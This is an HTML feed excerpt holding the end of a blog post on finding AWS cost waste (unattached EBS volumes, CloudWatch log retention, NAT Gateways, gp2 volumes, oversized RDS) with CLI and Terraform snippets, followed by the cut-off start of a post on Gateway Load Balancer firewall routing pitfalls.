&lt;p&gt;&lt;strong&gt;Find them:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ec2 describe-volumes &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--filters&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;status,Values&lt;span class="o"&gt;=&lt;/span&gt;available &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'Volumes[].{ID:VolumeId,Size:Size,Type:VolumeType,Created:CreateTime}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If that table has more than zero rows, you're paying for storage nobody uses.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prevent with Terraform:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_instance"&lt;/span&gt; &lt;span class="s2"&gt;"app"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;ami&lt;/span&gt;           &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ami_id&lt;/span&gt;
  &lt;span class="nx"&gt;instance_type&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;instance_type&lt;/span&gt;

  &lt;span class="nx"&gt;root_block_device&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;volume_type&lt;/span&gt;           &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"gp3"&lt;/span&gt;
    &lt;span class="nx"&gt;delete_on_termination&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;  &lt;span class="c1"&gt;# This is the line that matters&lt;/span&gt;
    &lt;span class="nx"&gt;encrypted&lt;/span&gt;             &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One line in your module. That's it. If your Terraform modules don't set this, every terminated instance leaves behind a volume that nobody will ever clean up.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. CloudWatch logs that never expire
&lt;/h2&gt;

&lt;p&gt;We like having application logs, don't we? Let's log everything: Lambda, all ECS tasks, every API Gateway - EVERYTHING! Retention? And what if, in 15 years, someone asks why that ECS task crashed? Don't set it.&lt;/p&gt;

&lt;p&gt;Logs are supposedly just text data. And it's hard to disagree, they are. It's worse when we log absolutely everything to CloudWatch. Although, no, that's not bad. What's bad is when we don't set any retention for those logs. Honestly, do you often find yourself reading logs older than a few days? Okay, that could still happen. But logs from a month ago? Probably once every 5 years would be useful, but even without that, you can survive. But even if you don't review them, remember - you have to pay for all those logs. It seems like peanuts, because it's only $0.03/GB. But they add up faster than you think. I've seen situations where CloudWatch was 15% of the monthly bill.&lt;/p&gt;

&lt;p&gt;The conclusion is simple: if you let AWS automatically create log groups (which, contrary to appearances, is the default behavior), retention is infinite. Are you using Terraform? Then use the retention policy and you won't have to worry about unusually high bills.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Find log groups with no retention:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws logs describe-log-groups &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'logGroups[?!retentionInDays].{Name:logGroupName,StoredBytes:storedBytes}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Fix immediately:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Set 30-day retention on a specific log group&lt;/span&gt;
aws logs put-retention-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--log-group-name&lt;/span&gt; &lt;span class="s2"&gt;"/aws/lambda/my-function"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--retention-in-days&lt;/span&gt; 30
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Prevent with Terraform:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Create the log group BEFORE the Lambda, so you control retention&lt;/span&gt;
&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_cloudwatch_log_group"&lt;/span&gt; &lt;span class="s2"&gt;"lambda"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;              &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/aws/lambda/${var.function_name}"&lt;/span&gt;
  &lt;span class="nx"&gt;retention_in_days&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;30&lt;/span&gt;  &lt;span class="c1"&gt;# ALWAYS set this&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  3. NAT Gateways nobody needs
&lt;/h2&gt;

&lt;p&gt;Oh, I love this topic. You probably already know that overlay routing helps reduce the already high costs of implementing VM-Series. Just creating a NAT Gateway costs ~33 USD, and not even a single bit has passed through it. And imagine that you have to adhere to HA, meaning you install one NAT Gateway in each AZ, and you have three of them. It costs 100 USD just to install a NAT Gateway. Not to mention that you'll pay 0.045 USD per GB.&lt;/p&gt;

&lt;p&gt;You know the problem? Most non-production environments seriously don't need three NAT Gateways. In fact, sometimes they don't need one at all.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Check utilization:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check bytes processed by each NAT Gateway over the last 7 days&lt;/span&gt;
aws cloudwatch get-metric-statistics &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; AWS/NATGateway &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--metric-name&lt;/span&gt; BytesOutToDestination &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--dimensions&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;NatGatewayId,Value&lt;span class="o"&gt;=&lt;/span&gt;nat-0123456789abcdef0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--start-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'7 days ago'&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--end-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--period&lt;/span&gt; 604800 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--statistics&lt;/span&gt; Sum
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Prevent with Terraform:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"environment"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# 1 NAT Gateway in dev/staging, N in production&lt;/span&gt;
&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_nat_gateway"&lt;/span&gt; &lt;span class="s2"&gt;"main"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt;         &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;"prod"&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;azs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
  &lt;span class="nx"&gt;allocation_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_eip&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;nat&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;count&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
  &lt;span class="nx"&gt;subnet_id&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_subnet&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;count&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It's also worth checking whether your private subnets are using the internet at all. Maybe some of them only communicate with other AWS services? Endpoints are a much cheaper solution than NAT Gateways.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. gp2 volumes that should be gp3
&lt;/h2&gt;

&lt;p&gt;This topic is also interesting. Basically, there's almost nothing you need to do here, and I see it practically everywhere.&lt;/p&gt;

&lt;p&gt;Except I can guess where that comes from. It's common wisdom that newer something (in this case, a higher version is associated with something newer) means more expensive. So, someone who doesn't use AWS every day starts up EC2 and sees the choice between gp2 and gp3 EBS. They think, "I'll go with the older, cheaper one." Mmm... good luck! gp3 is about 20% cheaper than gp2, has 3,000 IOPS and 125 MB/s base throughput. Despite this, according to &lt;a href="https://www.datadoghq.com/state-of-cloud-costs/" rel="noopener noreferrer"&gt;Datadog's State of Cloud Costs&lt;/a&gt; report, gp2 accounts for 58% of EBS spending.&lt;/p&gt;

&lt;p&gt;Generally, there's no scenario where gp2 is better - gp3 simply costs less and performs better. That's all.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Find all gp2 volumes:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ec2 describe-volumes &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--filters&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;volume-type,Values&lt;span class="o"&gt;=&lt;/span&gt;gp2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'Volumes[].{ID:VolumeId,Size:Size,State:State,Instance:Attachments[0].InstanceId}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Migrate (no downtime):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ec2 modify-volume &lt;span class="nt"&gt;--volume-id&lt;/span&gt; vol-0123456789abcdef0 &lt;span class="nt"&gt;--volume-type&lt;/span&gt; gp3
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. No shutdowns, no snapshots, no maintenance window. The migration occurs in the background while the volume remains connected and operational.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prevent with Terraform:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"volume_type"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"gp3"&lt;/span&gt;

  &lt;span class="nx"&gt;validation&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;condition&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;volume_type&lt;/span&gt; &lt;span class="err"&gt;!&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"gp2"&lt;/span&gt;
    &lt;span class="nx"&gt;error_message&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Use gp3 instead of gp2. It's 20% cheaper with better baseline performance."&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A validation block in the EC2 module rejects gp2 at plan time. This prevents anyone from accidentally deploying a costly option.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Over-provisioned RDS instances
&lt;/h2&gt;

&lt;p&gt;Time for dessert. Oh, how many companies are losing real money here. And let me give you an example. We have something to launch in production in eight months, so now let's use exactly the same parameters in the development environment that we'll use in production. So let's take a look at a &lt;code&gt;db.r6g.xlarge&lt;/code&gt; instance. Cost? Let's say an average of $350. Needed for development? Yes, the same as a bicycle for a fish.&lt;/p&gt;

&lt;p&gt;But this is still a rare case. In production, I've seen more than once someone set up RDS where the average CPU utilization is 5-8%. The last time such a move was in 2008, when the global crisis hit everyone.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Check CPU utilization over the last 14 days:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws cloudwatch get-metric-statistics &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; AWS/RDS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--metric-name&lt;/span&gt; CPUUtilization &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--dimensions&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;DBInstanceIdentifier,Value&lt;span class="o"&gt;=&lt;/span&gt;my-database &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--start-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'14 days ago'&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--end-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--period&lt;/span&gt; 86400 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--statistics&lt;/span&gt; Average &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Check for zero-connection databases:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws cloudwatch get-metric-statistics &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; AWS/RDS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--metric-name&lt;/span&gt; DatabaseConnections &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--dimensions&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;DBInstanceIdentifier,Value&lt;span class="o"&gt;=&lt;/span&gt;my-database &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--start-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'7 days ago'&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--end-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--period&lt;/span&gt; 3600 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--statistics&lt;/span&gt; Maximum &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Prevent with Terraform:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_db_instance"&lt;/span&gt; &lt;span class="s2"&gt;"main"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;instance_class&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;"prod"&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="s2"&gt;"db.r6g.large"&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"db.t4g.micro"&lt;/span&gt;
  &lt;span class="nx"&gt;multi_az&lt;/span&gt;          &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;"prod"&lt;/span&gt;
  &lt;span class="nx"&gt;allocated_storage&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;"prod"&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;20&lt;/span&gt;
  &lt;span class="nx"&gt;storage_type&lt;/span&gt;      &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"gp3"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Environment-aware sizing. Dev gets the minimum, production gets what it needs. No more copying production configs into staging and forgetting about it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The pattern behind all five
&lt;/h2&gt;

&lt;p&gt;You've probably noticed a key problem? Most of these topics don't apply to startups or small businesses that watch every cent twice. They apply to large companies. You know what's worse? That these large companies often look for savings on staffing in difficult times, not even on the things I mentioned. Nobody seems to pay attention to that. You know why? Because the staff has shrunk...&lt;/p&gt;

&lt;p&gt;And it's not like I see this everywhere. Usually, the teams I work with are really well-equipped with AWS. It's just that there's a real shortage of resources to devote to cost optimization in the cloud.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do about it
&lt;/h2&gt;

&lt;p&gt;Simply take these ready-made commands and run them on your environment. It'll take you maybe 10 minutes, and you might save someone or yourself a full-time job.&lt;/p&gt;

&lt;p&gt;If you want to go deeper into the topic - identify over-allocated computing resources, audit data transfer patterns, check liability coverage - that's a longer conversation. But start with these five. They can be checked for free, and most can be fixed for free.&lt;/p&gt;

&lt;p&gt;I built &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; to automate the security side of these checks - it runs 30+ checks in ~12 seconds. For cost specifically, the five CLI commands above are your starting point.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://haitmg.pl/blog/aws-cost-waste-audit-findings/" rel="noopener noreferrer"&gt;haitmg.pl&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>devops</category>
      <category>cloud</category>
      <category>terraform</category>
    </item>
    <item>
      <title>GWLB in Production: 9 Pitfalls That Break Your Firewall Architecture</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Tue, 10 Mar 2026 13:30:22 +0000</pubDate>
      <link>https://dev.to/haitmg/gwlb-in-production-9-pitfalls-that-break-your-firewall-architecture-2l4p</link>
      <guid>https://dev.to/haitmg/gwlb-in-production-9-pitfalls-that-break-your-firewall-architecture-2l4p</guid>
      <description>&lt;p&gt;As a Cloud Engineer, I have frequently implemented solutions for clients that enhance both network and application security in their infrastructures. One of the most frequently used solutions was the selection of Palo Alto VM-Series firewalls, specifically designed for public clouds. Implementing VM-Series, however, isn't as straightforward as it sounds in theory. To achieve a truly functional infrastructure, many other resources must be deployed around the firewalls themselves. Take AWS, for example. One of the most popular solutions is the use of a Gateway Load Balancer (in fact, this is one of the reasons this type of Load Balancer was implemented at AWS). Choosing GWLB, however, implies other dependencies, such as Gateway Load Balancer Endpoints, which should be located in dedicated subnets, and therefore, the routing tables should also be set up correctly in each of these subnets. Ultimately, it turns out that it's best to encapsulate the security portion of the infrastructure within a dedicated VPC. But since these are separate VPCs, they need to be connected to other Virtual Private Networks somehow so that this traffic is actually filtered and examined by firewalls. This is where Transit Gateway comes in.&lt;/p&gt;

&lt;p&gt;As you can see, simply gathering dependencies is no easy task, let alone configuring them. In this article, I'd like to focus on a few key aspects that can save you time if you choose this architecture. I've implemented this solution numerous times for clients across various industries. As I walk through the configuration process, I'll describe some not-so-typical issues, but ones that might give you a few extra gray hairs.&lt;/p&gt;

&lt;h2&gt;
  
  
  The architecture
&lt;/h2&gt;

&lt;p&gt;Before diving into the pitfalls, here's the centralized inspection architecture this article is about:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://haitmg.pl/images/gwlb-architecture.jpg" title="Click to open full-size diagram in new tab" rel="noopener noreferrer"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fhaitmg.pl%2Fimages%2Fgwlb-architecture.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fhaitmg.pl%2Fimages%2Fgwlb-architecture.jpg" alt="Centralized GWLB + VM-Series architecture: App VPC → Transit Gateway → Security VPC with GWLB Endpoints, Gateway Load Balancer, VM-Series firewalls, and NAT Gateways across 2 AZs" width="800" height="233"&gt;&lt;/a&gt;&lt;/p&gt;



&lt;p&gt;&lt;em&gt;Click the diagram to open full-size in a new tab — route table details are readable at full resolution.&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Asymmetric traffic forwarding without TGW Appliance Mode
&lt;/h2&gt;

&lt;p&gt;We're considering a scenario where we implement our solution in a centralized architecture. The Transit Gateway is responsible for sending traffic between VPCs. Now let's imagine this situation (let's trace the packet flow together).&lt;/p&gt;

&lt;p&gt;A virtual machine (let's call it app_vm) in Spoke VPC attempts to send a packet to a second virtual machine in another Spoke VPC (let's call it db_vm). app_vm is located in &lt;strong&gt;AZ A&lt;/strong&gt;, db_vm is located in &lt;strong&gt;AZ B&lt;/strong&gt;. Here's what happens:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;app_vm initiates a connection. It checks the routing table in its subnet, which states that every packet destined for the 172.16.0.0/16 subnet is sent to the Transit Gateway.&lt;/li&gt;
&lt;li&gt;Transit Gateway receives the packet from the VPC where app_vm is located. It checks the routing table associated with that VPC. The routing table clearly states: send this packet to Security VPC.&lt;/li&gt;
&lt;li&gt;Transit Gateway forwards the packet to Security VPC. And here's a very important point that will have consequences later. Due to &lt;strong&gt;AZ affinity&lt;/strong&gt; (TGW's default behavior - it sends traffic to the same AZ the packet originated from), the packet is sent to the Transit Gateway Attachment subnet in &lt;strong&gt;AZ A&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;The Transit Gateway Attachment subnet in AZ A receives the packet and forwards it to the Gateway Load Balancer Endpoint, also in AZ A.&lt;/li&gt;
&lt;li&gt;The packet reaches the Gateway Load Balancer and is then forwarded to the VM-Series in AZ A.&lt;/li&gt;
&lt;li&gt;Policies configured on the firewall allow the packet to pass through, so the packet is sent to the Gateway Load Balancer Endpoint subnet (AZ A) and then to the Transit Gateway.&lt;/li&gt;
&lt;li&gt;The Transit Gateway receives the packet from the Security VPC and forwards it based on the routing table to the Spoke VPC where db_vm is located. The packet reaches the destination machine.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Sounds good, right? Now let's trace the return traffic.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;db_vm responds to the request received from app_vm. It checks the routing table in its subnet, which says that a packet destined for 192.168.0.0/24 should be sent to the Transit Gateway. It does so.&lt;/li&gt;
&lt;li&gt;The Transit Gateway receives this packet, checks the routing table, and forwards it to the Security VPC.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;This is the key moment.&lt;/strong&gt; Due to the same AZ affinity mechanism, the Transit Gateway sends this packet to the Transit Gateway Attachment subnet in &lt;strong&gt;AZ B&lt;/strong&gt; - because db_vm is in AZ B. This is not random - TGW deterministically picks the AZ based on where the packet entered.&lt;/li&gt;
